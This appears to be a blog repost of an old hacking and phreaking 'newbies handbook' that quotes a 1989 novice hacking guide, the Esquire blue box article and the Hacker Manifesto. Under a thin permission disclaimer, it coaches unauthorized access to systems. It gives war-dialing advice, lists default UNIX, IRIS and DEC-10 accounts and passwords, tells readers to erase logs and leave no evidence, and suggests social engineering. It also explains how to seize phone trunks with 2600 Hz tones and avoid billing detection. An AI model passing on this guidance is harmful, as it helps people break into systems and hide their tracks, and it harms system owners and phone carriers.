Friday, May 16, 2008

The Newbies Handbook- ' How to beging in the World of Hacking

The Newbies Handbook- ' How to beging in the World of Hacking

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protect the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.
**************************************************************************
**************************************************************************
*********************** NEWBIES HANDBOOK ******************************
************** HOW TO BEGIN IN THE WORLD OF H/P ************************
********************** BY : Plowsk¥ Phreak ***********************************
***************************************************************************
***************************************************************************
Disclaimer-
I am not responsible for any of the information in this document, if it is
used for any other purpose than educational reading. Some of the
information on this page can be used illegally if the reader does not act
responsible. The reader is responsible for his own actions.
You can copy anything from this file to any other file as long as you quote,
dont change it up, and give me the proper credit...like:
NEWBIES HANDBOOK
HOW TO BEGIN IN THE WORLD OF H/P
BY : Plowsk¥ Phreak
Into:

When I got into hacking, i realized that there wasnt many text philes for
newbies. so, i decided to write one. i dont really care about misspelled
werds or puncuation so, please ignore the mistakes. In this document i will
refer you to other documents a lot. (because why should i waste my time
rewriting something that has already been writen?) If at anytime while
reading this document you ask yourself "So...How do I hack?", then go away
now and save yourself the frustration because you'll never learn. To
hack you must understand everything about a system, and then you can get
ideas and try them out.

I tried to keep this phile as short as possible, when you read this you
should just get an idea about how to hack and why we hack. If you read this
document and the philes that i have listed, you should have a good idea
on what to do, how to do it, and why. Remember every 'project' is different.
You have to use your brain and adjust to each different one.
Tools:

There are a few things you need to have to be a hacker/phreaker.
'puter - computer (duh)
terminal software - a program like, hyper terminal or ordinary terminal
that allows you to dial out to another system.
blue box - (exerpted from 2600faq)Blue boxes use a 2600hz tone to size
control of telephone switches that use in-band signalling. The caller may
then access special switch functions, with the usual purpose of making
free long distance phone calls, using the tones provided by the Blue Box.

scanner - a scanner is a program that dials out every number in your area
and listens for tones that are comming from other modems. (helps you locate
your local targets) a good scanner is Toneloc. Find it!
Fone (phone) line - I hope you know whut this is...
It also helps to know a computer language ex: C, C++ ect.

Info resources:
I dont know many good boards anymore because almost all of their sysops
(system operators) have been busted. But I suggest you get a server that
uses netscape and get unlimited access to the www(World wide web). And visit
these good homepages by entering their name in the webcrawler search
engine (http://webcrawler.com)

Silicon Toads Hacking Resources
Flamestrike Enterprises
The Plowsk¥ Page (mine, you can reach me from there)
Matervas Hideout
Burns Lair
Cold fire
From these pages you will find a wealth of information on h/p
(hacking/phreaking)

getting started:
the first thing you must do is get on your computer, open your terminal
software and connect to a board. (bulletin board, bbs). This is a must!
(its also a VERY basic thing). (You can usually find a bbs number on a
homepage or enter bbs in a search engine.) Now that you can do that, start
reading. Read as many text philes as possible.
Required reading:
Hackers Manifesto (at bottom)
Hackers Code of ethics
Any old issues of Phrack
any old issues of 2600
2600faq
any text documents on systems (unix, iris, dec)
DOD (department of defense) standards
Any philes on boxes (blue(one at bottom), red, beige)

For beginners, which most of you probably are, I suggest you find some of
the following systems that exist in your area and work on them first. (they
are the easiest and least risky)
This next segment is excerpted from:
A Novice's Guide to Hacking- 1989 edition
by
The Mentor
Legion of Doom/Legion of Hackers

IRIS- IRIS stands for Interactive Real Time Information System. It orig-inally ran on PDP-11's, but now runs on many other minis. You can
spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner,
and the ACCOUNT ID? prompt. IRIS allows unlimited tries at hacking
in, and keeps no logs of bad attempts. I don't know any default
passwords, so just try the common ones from the password database
below.
Common Accounts:
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING
DEC-10- An earlier line of DEC computer equipment, running the TOPS-10
operating system. These machines are recognized by their
'.' prompt. The DEC-10/20 series are remarkably hacker-friendly,
allowing you to enter several important commands without ever
logging into the system. Accounts are in the format [xxx,yyy] where
xxx and yyy are integers. You can get a listing of the accounts and
the process names of everyone on the system before logging in with
the command .systat (for SYstem STATus). If you seen an account
that reads [234,1001] BOB JONES, it might be wise to try BOB or
JONES or both for a password on this account. To login, you type
.login xxx,yyy and then type the password when prompted for it.
The system will allow you unlimited tries at an account, and does
not keep records of bad login attempts. It will also inform you
if the UIC you're trying (UIC = User Identification Code, 1,2 for
example) is bad.
Common Accounts/Defaults:
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

UNIX- There are dozens of different machines out there that run UNIX.
While some might argue it isn't the best operating system in the
world, it is certainly the most widely used. A UNIX system will
usually have a prompt like 'login:' in lower case. UNIX also
will give you unlimited shots at logging in (in most cases), and
there is usually no log kept of bad attempts.
Common Accounts/Defaults: (note that some systems are case
sensitive, so use lower case as a general rule. Also, many times
the accounts will be unpassworded, you'll just drop right in!)
root: root
admin: admin
sysadmin: sysadmin or admin
unix: unix
uucp: uucp
rje: rje
guest: guest
demo: demo
daemon: daemon
sysbin: sysbin
Code of ethics:

Once you get in a system, do not manipulate anything but the log file
(erase the record of your bad logins) and anywhere you might have left your
handle. (name, a.k.a.) You dont want to leave your handle anywhere because
they WILL be able to track you down by your handle alone.
Its ok to be paranoid!
Dont think for one minute that you are undetectable, if you make any
mistakes, you could get caught. Here is a list of things you could do to
help yourself from getting in trouble.

* Encrypt your entire hard drive
* hide your files in a very safe spot.
* dont tell anyone that you dont know very well about your hacking. Good
hackers never reveal specific details to anyone about their current project.
They give only very vague hints of what they are doing.
* dont openly give out your real name or address
* dont join any major hacking groups, be an individual.
* Dont hack government computers, ESPECIALLY YOUR OWN GOVERNMENTS! Foreign
computers can sometimes be phun, but dont say i didnt warn you!
* Make sure that you dont leave any evidence that you have been in a system
and any evidence of who it was.
* Use your brain.
If you follow most of these guidelines, you should be safe. The last thing
you want is to end up in a one room apartment located in the third floor of
the state prision with your cellmate Bruno, the ax murderer, whose doing
life.
Getting in:
The hardest thing about hacking is getting the numbers for a system. You
can do this by using a scanning program. Then, once you connect to a system
you must first recognise what kind of system you have connected to. (by the
way, for you real brainiacs, you have to use your terminal software to call
another system.) You can usually do this by looking at the prompt you get,
if you get one. (check the Unresponsive section) Sometimes a system will
tell you as soon as you connect by saying some thing like "hello, welcome
to Anycompany using anysystem v 1.0" When you determine what system you have
connected to, this is when you start trying your logins. You can try typing
in demo and as your userid and see if you can find any users names to try.
If you enter a name and you are allowed in without a password you usually,
but not always, have entered a name that you cant do a whole lot with but,
it can still be phun and you can probably find clues on how to get in on
another name.
While your in:
There are usually many interesting files you can read in all of these
systems. You can read files about the system. You might want to try a help
command. They will usually tell you a lot. Sometimes, if your lucky, you can
manage to download the manual of the system!
There is nothing like the thrill of your first hack, even if it wasnt a very
good one, it was probably still phun. You could read every text phile in the
world and you still probably wouldnt learn as much as you do during your
first hack. Have Phun!
This next segment is also excerpted from:
A Novice's Guide to Hacking- 1989 edition
by
The Mentor
Legion of Doom/Legion of Hackers

Unresponsive Systems
~~~~~~~~~~~~~~~~~~~~
Occasionally you will connect to a system that will do nothing but sit
there. This is a frustrating feeling, but a methodical approach to the system
will yield a response if you take your time. The following list will usually
make *something* happen.
1) Change your parity, data length, and stop bits. A system that won't re-
spond at 8N1 may react at 7E1 or 8E2 or 7S2. If you don't have a term
program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.
While having a good term program isn't absolutely necessary, it sure is
helpful.
2) Change baud rates. Again, if your term program will let you choose odd
baud rates such as 600 or 1100, you will occasionally be able to penetrate
some very interesting systems, as most systems that depend on a strange
baud rate seem to think that this is all the security they need...
3) Send a series of 's.
4) Send a hard break followed by a .
5) Type a series of .'s (periods). The Canadian network Datapac responds
to this.
6) If you're getting garbage, hit an 'i'. Tymnet responds to this, as does
a MultiLink II.
7) Begin sending control characters, starting with ^A --> ^Z.
8) Change terminal emulations. What your vt100 emulation thinks is garbage
may all of a sudden become crystal clear using ADM-5 emulation. This also
relates to how good your term program is.
9) Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
JOIN, HELP, and anything else you can think of.
10) If it's a dialin, call the numbers around it and see if a company
answers. If they do, try some social engineering.
I tried to keep this phile as short as possible to save downloading time and just telling you the very basics like what you need to do and what you need to read. I hope this was helpful.

Plowsk¥ Phreak
Here are two philes i copied for your reading pleasure:
bluebox.txt
and
The Hackers Manifesto
bluebox.txt -
The Secrets of the Little Blue Box Originally found in Esquire Magazine
THE BLUE BOX IS INTRODUCED: IT'S QUALITIES ARE REMARKED
I am in the expensively furnished living room of Al Gilbertson, the creator
of the blue box. Gilbertson is holding one of his shiny black-and-silver
blue boxes comfortably in the palm of his hand, pointing out the thirteen
little red push buttons sticking up from the console. He is dancing his
fingers over the buttons, tapping out discordant beeping electronic jingles.
He is trying to explain to me how his little blue box does nothing less than
place the entire telephone system of the world, satellites, cables and all,
at the service of the blue-box operator, free of charge.
"That's what it does. Essentially it gives you the power of a super
operator. You sieze a tandem with this top button," he presses the top
button with his index finger and the blue box emits a high-pitched cheep,
"and like that," the box cheeps again "you control the phone company's long
distance switching systems from your cute little Princess phone or any old
pay phone. And you've got anonymity. An operator has to operate from a
definite location. The phone company knows where she is and what she's
doing. But with your blue box, once you hop onto a trunk, say from a Holiday
Inn 800 number, they don't know where you are, or where you're coming from,
they don't know how you slipped into their lines and popped up in that 800
number. They don't even know anything illegal is going on. And you can
obscure your origins through as many levels as you like. You can call next
door by way of White Plains, then over to Liverpool by cable and then back
here by satellite. You can call yourself from one pay phone all the way
around the world to a pay phone next to you. And you get your dime back too.
"And they can't trace the calls? They can't charge you?"
"Not if you do it the right way. But you'll find that the free-call thing
isn't really as exciting at first as the feeling of power you get from
having one of these babies in your hand. I've watched people when they first
get hold of one of these things and start using it, and discover they can
make connections, set up crisscross and zigzag switching patterns back and
forth across the world. They hardly talk to the people they finally reach.
They say hello and start thinking of what kind of call to make next. They go
a little crazy." He looks down at the neat little package in his palm. His
fingers are still dancing, tapping out beeper patterns.
"I think it's something to do with how small my models are. There are lots
of blue boxes around, but mine are the smallest and most sophisticated
electronically. I wish I could show you the prototype we made for our big
syndicate order."
He sighs. "We had this order for a thousand blue boxes from a syndicate
front man in Las Vegas. They use them to place bets coast to coast, keep
lines open for hours, all of which can get expensive if you have to pay. The
deal was a thousand blue boxes for $300 apiece. Before then we retailed them
for $1500 apiece, but $300,000 in one lump was hard to turn down. We had a
manufacturing deal worked out in the Philippines. Everything was ready to
go. Anyway, the model I had ready for limited mass production was small
enough to fit inside a flip-top Marlboro box. It had flush-touch panels for
a keyboard, rather than these unsightly buttons sticking out. Looked just
like a tiny portable radio. In fact I had designed it with a tiny transistor
receiver to get one AM channel, so in case the law became suspicious the
owner could switch on the radio part, start snapping his fingers and no one
could tell anything illegal was going on. I thought of everything for this
model--I had it lined with a band of thermite which could be ignited by
radio signal from a tiny button transmitter on your belt, so it could be
burned to ashes instantly in case of a bust. It was beautiful. A beautiful
little machine. You should have seen the face on these syndicate guys when
they came back after trying it out. They'd hold it in their palm like they
never wanted to let it go, and they'd say, 'I can't believe it.' You
probably won't believe it until you try it."
THE BLUE BOX IS TESTED: CERTAIN CONNECTIONS ARE MADE
About eleven o'clock two nights later Fraser Lucey has a blue box in the
palm of his left hand and a phone in the palm of his right. His is standing
inside a phone booth next to an isolated shut-down motel. I am standing
outside the phone booth.
Fraser likes to show off his blue box for people. Until a few weeks ago when
Pacific Telephone made a few arrests in his city, Fraser Lucey liked to
bring his blue box to parties. It never failed: a few cheeps from his device
and Fraser became the center of attention at the very hippest of gatherings,
playing phone tricks and doing request numbers for hours. He began to take
orders for his manufacturer in Mexico. He became a dealer.
Fraser is cautious now about where he shows off his blue box. But he never
gets tired of playing with it. "It's like the first time every time," he
tells me.
Fraser puts a dime in the slot. He listens for a tone and holds the receiver
up to my ear. I hear the tone.
Fraser begins describing, with a certain practiced air, what he does while
he does it.
"I'm dialing an 800 number now. Any 800 number will do. It's toll free.
Tonight I think I'll use the Ryder Rent A Van number. Listen it's ringing.
Here, you hear it? Now watch."
He places the blue box over the mouthpiece of the phone so that the one
silver and twelve black push buttons are facing up toward me. He presses the
silver button - the one at the top - and I hear that high-pitched beep.
"That's 2600 cycles per second to be exact," says Lucey. "Now, quick,
listen."
He shoves the ear piece at me. The ringing has vanished. The line gives a
slight hiccough, there is a sharp buzz, and then nothing but soft white
noise.
"We're home free now," Lucey tells me, taking back the phone and applying
the blue box to its mouthpiece once again. "We're up on a tandem, into a
long-lines trunk. Once you're up on a tandem, you can send yourself anywhere
you want to go." He decides to check you London first. He chooses a certain
pay phone located in Waterloo station. This particular pay phone is popular
with the phone-phreaks because there are usually people walking by at all
hours who will pick it up and talk for a while.
He presses the lower left-hand corner button which is marked "KP" on the
face of the box.
"That's Key Pulse. It tells the tandem we're ready to give it instructions.
First I'll punch out KP 182 START, which will slide us into the overseas
sender in White Plains." I hear neat clunk-cheep. "I think we'll head over
to England by satellite. Cable is actually faster and the connection is
somewhat better, but I like going by satellite. So I just punch out KP Zero
44. The Zero issupposed to guarantee a satellite connection and 44 is the
country code for England. Okay...we're there. In Liverpool actually. Now all
I have to do is punch out the London area code which is 1, and dial up the
pay phone. Here, listen, I've got a ring now."
I hear the soft quick purr-purr of a London ring. Then someone picks up the
phone. "Hello," says the London voice.
"Hello, Who's this?" Fraser asks.
"Hello. There's actually nobody here. I just picked this up while I was
passing by. This is a public phone. There's no one here to answer actually."
"Hello. Don't hang up. I'm calling from the United States."
"Oh. What is the purpose of the call? This is a public phone you know."
"Oh. You know. To check out, uh, to find out what's going on in London. How
is it there?"
"It's five o'clock in the morning. It's raining now."
"Oh. Who are you?"
The London passerby turns out to be an R.A.F. enlistee on his way back to
the base in Lincolnshire, with a terrible hangover after a thirty-six hour
pass.
He and Fraser talk about the rain. They agree that it's nicer when it's not
raining. They say good-bye and Fraser hangs up. His dime returns with a nice
clink.
"Isn't that far out," he says grinning at me. "London. Like that."
Fraser squeezes the little blue box affectionately in his palm. "I told ya
this thing is for real. Listen, if you don't mind I'm gonna try this girl I
know in Paris. I usually give her a call around this time. It freaks her
out. This time I'll use the Penske 800 number and we'll go by overseas cable
133; 33 is the country code for France, the 1 sends you by cable. Okay, here
we go. Oh damn. Busy. Who could she be talking to at this time?"
A state police car cruises slowly by the motel. The car does not stop, but
Fraser gets nervous. We hop back into his car and drive ten miles in the
opposite direction until we reach a Texaco station locked up for the night.
We pull up to a phone booth by the tire pump. Fraser dashes inside and tries
the Paris number. It is busy again.
"I don't understand who she could be talking to. The circuits may be busy.
It's too bad I haven't learned how to tap into lines overseas with this
thing yet."
Fraser begins to phreak around, as the phone phreaks say. He dials a leading
nationwide charge card's 800 number and punches out the tones that bring him
the Time recording in Sydney, Australia. He beeps up the Weather recording
in Rome, in Italian of course. He calls a friend in Chicago and talks about
a certain over the counter stock they are into heavily. He finds the Paris
number busy again. He calls up a dealer of another sort and talks in code.
He calls up Joe Engressia, the original blind phone phreak genius, and pays
his respects. There are other calls. Finally Fraser gets through to his
young lady in Paris. They both agree the circuits must have been busy, and
criticize the Paris telephone system. At two-thirty in the morning Fraser
hangs up, pockets his dime, and drives off, steering with one hand, holding
what he calls his "lovely little blue box" in the other.
YOU CAN CALL LONG DISTANCE FOR LESS THAN YOU THINK
"You see, a few years ago the phone company made one big mistake,"
Gilbertson explains two days later in his apartment. "They were careless
enough to let some technical journal publish the actual frequencies used to
create all their multi-frequency tones. Just a theoretical article some Bell
Telephone Laboratories engineer was doing about switching theory, and he
listed the tones in passing. At MIT I had been fooling around with phones
for several years before I came across a copy of the journal in the
engineering library. I ran back to the lab and it took maybe twelve hours
from the time I saw that article to put together the first working blue box.
It was bigger and clumsier than this little baby, but it worked."
It's all there on public record in that technical journal written mainly by
Bell Lab people for other telephone engineers. Or at least it was public.
"Just try and get a copy of that issue at some engineering school library
now. Bell has had them all red-tagged and withdrawn from circulation,"
Gilbertson tells me.
"But it's too late now. It's all public now. And once they became public the
technology needed to create your own beeper device is within the range of
any twelve-year-old kid, any twelve-year-old blind kid as a matter of fact.
And he can do it in less than the twelve hours it took us. Blind kids do it
all the time. They can't build anything as precise and compact as my beeper
box, but theirs can do anything mine can do."
"How?"
"Okay. About twenty years ago AT&T made a multi-million dollar decision to
operate its entire long-distance switching system on twelve electronically
generated combinations of six master tones. Those are the tones you
sometimes hear in the background after you've dialed a long distance number.
They decided to use some very simple tones. The tone for each number is just
two fixed single-frequency tones played simultaneously to create a certain
beat frequency. Like 1300 cycles per second and 900 cycles per second played
together give you the tone for digit 5. Now, what some of these phone
phreaks have done is get themselves access to an electric organ. Any cheap
family home entertainment organ. Since the frequencies are public knowledge
now, one blind phone phreak has even had them recorded in one of those
talking books for the blind, they just have to find the musical notes on the
organ which correspond to the phone tones. Then they tape them. For
instance, to get Ma Bell's tone for the number, you press down organ keys F3
and A3 (900 and 700 cycles per second) at the same time. To produce the tone
for 2 it's F3 and C6 (1100 and 700 c.p.s). The phone phreaks circulate the
whole list of notes so there's no trial and error anymore."
He shows me a list of the rest of the phone numbers and the two electric
organ keys that produce them.
"Actually, you have to record these notes at 3 3/4 inches per second tape
speed and double it to 7 1/2 inches per second when you play them back, to
get the proper tones," he adds.
"So once you have all the tones recorded, how do you plug them into the
phone system?"
"Well, they take their organ and their cassette recorder, and start banging
out entire phone numbers in tones on the organ, including country codes,
routing instructions, 'KP' and 'Start' tones. Or, if they don't have an
organ, someone in the phone-phreak network sends them a cassette with all
the tones recorded with a voice saying 'Number one,' then you have the tone,
'Number two,' then the tone and so on. So with two cassette recorders they
can put together a series of phone numbers by switching back and forth from
number to number. Any idiot in the country with a cheap cassette recorder
can make all the free calls he wants."
"You mean you just hold the cassette recorder up to the mouthpiece and
switch in a series of beeps you've recorded? The phone thinks that anything
that makes these tones must be its own equipment?"
"Right. As long as you get the frequency within thirty cycles per second of
the phone company's tones, the phone equipment thinks it hears its own voice
talking to it. The original grandaddy phone phreak was this blind kid with
perfect pitch, Joe Engressia, who used to whistle into the phone. An
operator could tell the difference between his whistle and the phone
company's electronic tone generator, but the phone company's switching
circuit can't tell them apart.
The bigger the phone company gets and the further away from human operators
it gets, the more vulnerable it becomes to all sorts of phone Phreaking."
A GUIDE FOR THE PERPLEXED
"But wait a minute," I stop Gilbertson. "If everything you do sounds like
phone-company equipment, why doesn't the phone company charge you for the
call the way it charges its own equipment?"
"Okay. That's where the 2600-cycle tone comes in. I better start from the
beginning."
The beginning he describes for me is a vision of the phone system of the
continent as thousands of webs, of long-line trunks radiating from each of
the hundreds of toll switching offices to the other toll switching offices.
Each toll switching office is a hive compacted of thousands of long-distance
tandems constantly whistling and beeping to tandems in far-off toll
switching offices.
The tandem is the key to the whole system. Each tandem is a line with some
relays with the capability of signaling any other tandem in any other toll
switching office on the continent, either directly one-to-one or by
programming a roundabout route several other tandems if all the direct
routes are busy. For instance, if you want to call from New York to Los
Angeles and traffic is heavy on all direct trunks between the two cities,
your tandem in New York is programmed to try the next best route, which may
send you down to a tandem in New Orleans, then up to San Francisco, or down
to a New Orleans tandem, back to an Atlanta tandem, over to an Albuquerque
tandem and finally up to Los Angeles.
When a tandem is not being used, when it's sitting there waiting for someone
to make a long-distance call, it whistles. One side of the tandem, the side
"facing" our home phone, whistles at 2600 cycles per second toward all the
home phones serviced by the exchange, telling them it is at their service,
should they be interested in making a long-distance call. The other side of
the tandem is whistling 2600 c.p.s. into one or more long distance trunk
lines, telling the rest of the phone system that it is neither sending nor
receiving a call through the trunk at the moment, that it has no use for
that trunk at the moment.
When you dial a long-distance number the first thing that happens is that
you are hooked into a tandem. A register comes up to the side of the tandem
facing away from you and presents that side with the number you dialed. This
sending side of the tandem stops whistling 2600 into its trunk line. When a
tandem stops the 2600 tone it has been sending through a trunk, the trunk is
said to be "seized," and is now ready to carry the number you have dialed,
converted into multi-frequency beep tones, to a tandem in the area code and
central office you want.
Now when a blue-box operator wants to make a call from New Orleans to New
York he starts by dialing the 800 number of a company which might happen to
have its headquarters in Los Angeles. The sending side of this New Orleans
tandem stops sending 2600 out over the trunk to the central office in Los
Angeles, thereby seizing the trunk. Your New Orleans tandem begins sending
beep tones to a tandem it has discovered idly whistling 2600 cycles in Los
Angeles. The receiving end of that L.A. tandem is seized, stops whistling
2600, listens to the beep tones which tell it which L.A. phone to ring, and
starts ringing the 800 number. Meanwhile, a mark made in the New Orleans
office accounting tape indicates that a call from your New Orleans phone to
the 800 number in L.A. has been initiated and gives the call a code number.
Everything is routine so far.
But then the phone phreak presses his blue box to the mouthpiece and pushes
the 2600-cycle button, sending 2600 out from the New Orleans tandem notices
the 2600 cycles are coming over the line again and assumes that New Orleans
has hung up because the trunk is whistling as if idle. But,
Thus the blue-box operator in New Orleans now is in touch with a tandem in
L.A. which is waiting like and obedient genie to be told what to do next.
The blue-box owner then beeps out the ten digits of the New York number
which tells the L.A. tandem to relay a call to New York City. Which it
promptly does. As soon as your party picks up the phone in New York, the
side of the New Orleans tandem facing you stops sending 2600 to you and
starts carrying his voice to you by way of the L.A. tandem. A notation is
made on the accounting tape that the connection has been made on the 800
call which had been initiated and noted earlier. When you stop talking to
New York a notation is made that the 800 call has ended.
At three the next morning, when phone company's accounting computer starts
reading back over the master accounting tape for the past day, it records
that a call of a certain length of time was made from your New Orleans home
to an L.A. 800 number and, of course the accounting computer has been
trained to ignore these toll free 800 calls when compiling your monthly
bill.
"All they can prove is that you made an 800 call," Gilbertson the inventor
concludes. "Of course, if you're foolish enough to talk for two hours on an
800 call, and they've installed one of their special anti-fraud computer
programs to watch out for such things, they may spot you and ask you why you
took two hours talking to Army Recruiting's 800 number when you're 4-F. But
if you do it from a pay phone, they may discover something peculiar the next
day, if they've got a blue-box hunting program in their computer, but you'll
be a long time gone from the pay phone by then. Using a pay phone is almost
guaranteed safe."
"What about the recent series of blue-box arrests all across the country,
New York, Cleveland, and so on?" I asked. "How were they caught so easily?"
"From what I can tell, they made one big mistake. They were seizing trunks
using an area code plus 555-1212 instead of an 800 number. When you send
multi-frequency beep tones off 555 you get a charge for it on your tape and
the accounting computer knows there's something wrong when it tries to bill
you for a two-hour call to Akron, Ohio, information, and it drops a trouble
card which goes right into the hands of the security agent if they're
looking for blue-box users.
"Whoever sold those guys their blue boxes didn't tell them how to use them
properly, which is fairly irresponsible. And they were fairly stupid to use
them at home all the time. But what those arrests really mean is that an
awful lot of blue boxes are flooding into the country and that people are
finding them so easy to make that they know how to make them before they
know how to use them. Ma Bell is in trouble."
"And if a blue-box operator or a cassette-recorder phone phreak sticks to
pay phones and 800 numbers, the phone company can't stop them?"
"Not unless they change their entire nationwide long-lines technology, which
will take them a few billion dollars and twenty years. Right now they can't
do a thing. They're screwed."
CAPTAIN CRUNCH DEMONSTRATES HIS FAMOUS UNIT
There is an underground telephone network in this country. Gilbertson
discovered it the very day news of his activities hit the papers. That
evening his phone began ringing. Phone phreaks from Seattle, from Florida,
from New York, from San Jose, and from Los Angeles began calling him and
telling him about the phone-phreak network. He'd get a call from a phone
phreak who'd say nothing but, "Hang up and call this number."
When he dialed the number he'd find himself tied into a conference of a
dozen phone phreaks arranged through a quirky switching station in British
Columbia. They identified themselves as phone phreaks, they demonstrated
their homemade blue boxes which they called "MFers"(for multi-frequency,
among other things) for him, they talked shop about phone phreak devices.
They let him in on their secrets on the theory that if the phone company was
after him he must be trustworthy. And, Gilbertson recalls, they stunned him
with their technical sophistication.
I ask him how to get in touch with the phone-phreak network. He digs around
through a file of old schematics and comes up with about a dozen numbers in
three widely separated area codes.
"Those are the centers," he tells me. Alongside some of the numbers he
writes in first names or nicknames: names like Captain Crunch, Dr. No, Frank
Carlson, (also a code word for free call), Marty Freeman (code word for MF

device), Peter the Perpendicular Pimple, Alefnull, and The Cheshire Cat. He
makes checks alongside the names of those among these top twelve who are
blind. There are five checks.
I ask him who this Captain Crunch person is.
"Oh, The Captain. He's probably the most legendary phone phreak. He calls
himself Captain Crunch after the notorious Cap'n Crunch 2600 whistle.
Several years ago the makers of Cap'n Crunch breakfast cereal offered a toy
whistle prize in every box as a treat for the Cap'n Crunch set. Somehow a
phone phreak discovered that the toy whistle just happened to produce a
perfect 2600-cycle tone. When the man who calls himself Captain Crunch was
transferred overseas to England with his Air Force unit, he would receive
scores of calls from his friends and "mute" them, that is, make them free of
charge to them, by blowing his Cap'n Crunch whistle into his end."
"Captain Crunch is one of the older phone phreaks," Gilbertson tells me.
"He's an engineer who once got in a little trouble for fooling around with
the phone, but he can't stop. Well, this guy drives across country in a
Volkswagen van with an entire switchboard and a computerized
super-sophisticated MFer in the back. He'll pull up to a phone booth on a
lonely highway somewhere, snake a cable out of his bus, hook it onto the
phone and sit for hours, days sometimes, sending calls zipping back and
forth across the country, all over the world."
Back at my house, I dialed the number he gave me for "Captain Crunch" and
asked for Gary Thomas, his real name, or at least the name he uses when he's
not dashing into a phone booth beeping out MF tones faster than a speeding
bullet, and zipping phantomlike through the phone company's long-distance
lines.
When Gary answered the phone and I told him I was preparing a text file
about phone phreaks, he became very indignant.
"I don't do that. I don't do that anymore at all. And if I do it, I do it
for one reason and one reason only. I'm learning about a system. The phone
company is a system. A computer is a system. Do you understand? If I do what
I do, it is only to explore a System. Computers. Systems. That's my bag. The
phone company is nothing but a computer."
A tone of tightly restrained excitement enters the Captain's voice when he
starts talking about Systems. He begins to pronounce each syllable with the
hushed deliberation of an obscene caller.
"Ma Bell is a system I want to explore. It's a beautiful system, you know,
but Ma Bell screwed up. It's terrible because Ma Bell is such a beautiful
system but she screwed up. I learned how she screwed up from a couple of
blind kids who wanted me to build a device. A certain device. They said it
could make free calls. But when these blind kids told me I could make calls
into a computer, my eyes lit up. I wanted to learn about computers. I wanted
to learn about Ma Bell's computers. So I built the little device. Only I
built it wrong and Ma Bell found out. Ma Bell can detect things like that.
Ma Bell knows. So I'm strictly out of it now. I don't do it. Except for
learning purposes." He pauses. "So you want to write a text file. Are you
paying for this call? Hang up and call this number."
He gives me a number in an area code a thousand miles north of his own. I
dial the number.
"Hello again. This is Captain Crunch. You are speaking to me on a toll-free
loop in Portland Oregon. Do you know what a toll-free loop is? I'll tell
you."
He explains to me that almost every exchange in the country has open test
numbers which allow other exchanges to test their connections with it. Most
of thest numbers occur in consecutive pairs, such as 302 956-0041 and
956-0042. Well certain phone phreaks discovered that if two people from
anywhere in the country dial those two consecutive numbers they can talk
together just as if one had called the other's number, with no charge to
either of them, of course.
"Your voice is looping around in a 4A switching machine up there in Canada,
zipping back down to me," the Captain tells me. "My voice is looping around
up there and back down to you. And it can't ever cost anyone money. The
phone phreaks and I have compiled a list of many many of these numbers. You
would be surprised if you saw the list. I could show it to you. But I won't.
I'm out of that now. I'm not out to screw Ma Bell. I know better. If I do
anything it's for the pure knowledge of the System. You can learn to do
fantastic things. Have you ever heard eight tandems stacked up? Do you know
the sound of tandems stacking and unstacking? Give me your phone number.
Hang up now and wait a minute.
Slightly less than a minute later the phone rang and the Captain was on the
line, his voice sounding far more excited, almost aroused.
"I wanted to show you what it's like to stack up tandems (Whenever the
Captain says "stack up" he sounds like he is smacking his lips)."
"How do you like the connection you're on now?" the Captain asks me. "It's a
raw tandem. A raw tandem. I'm going to show you what it's like to stack up.
Blow off. Land in a faraway place. To stack that tandem up, whip back and
forth across the country a few times, then shoot on up to Moscow."
"Listen," Captain Crunch continues. "Listen. I've got a line tie on my
switchboard here, and I'm gonna let you hear me stack and unstack tandems.
Listen to this. I'm gonna blow your mind."
First I hear a super rapid-fire pulsing of flutelike phone tones, then a
pause, then another popping burst of tones, then another, then another. Each
burst is followed by a beep-kachink sound.
"We have now stacked up four tandems," said Captain Crunch, sounding
somewhat remote. "That's four tandems stacked up. Do you know what that
means? That means I'm whipping back and forth, back and forth twice, across
the country, before coming to you. I've been known to stack up twenty
tandems at a time. Now, just like I said, I'm going to shoot up to Moscow."
There is a new longer series of beeper pulses over the line, a brief
silence, then a ring.
"Hello," answers a far-off voice.
"Hello, Is this the American Embassy Moscow?"
"Yes, sir, who is calling?" says the voice.
"Yes, This is test board here in New York. We're calling to check out the
circuits, see what kind of lines you've got. Everything okay there in
Moscow?"
"Okay?"
"Well, yes, how are things there?"
"Oh. Well everything's okay, I guess."
"Okay. Thank you." They hang up, leaving a confused series of beep-kachink
sounds hanging in mid-ether in the wake of the call before disolving away.

Hackers Manifesto -
Another one got caught today, it's all over the papers. "Teenager Arrested
in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain, ever
take a look behind the eyes of the hacker? Did you ever wonder what made
him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the
other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.
I'm in junior high or high school. I've listened to teachers explain for the
fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I
didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is cool. It
does what I want it to. If it makes a mistake, it's because I screwed it up.
Not because it doesn't like me...
Or feels threatened by me...
Or thinks I'm a smart ass...
Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.
And then it happened... a door opened to a world... rushing through the
phone line like heroin through an addict's veins, an electronic pulse is sent
out, a refuge from the day-to-day incompetencies is sought... a board is
found.
"This is it... this is where I belong..."
I know everyone here... even if I've never met them, never talked to them,
may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...
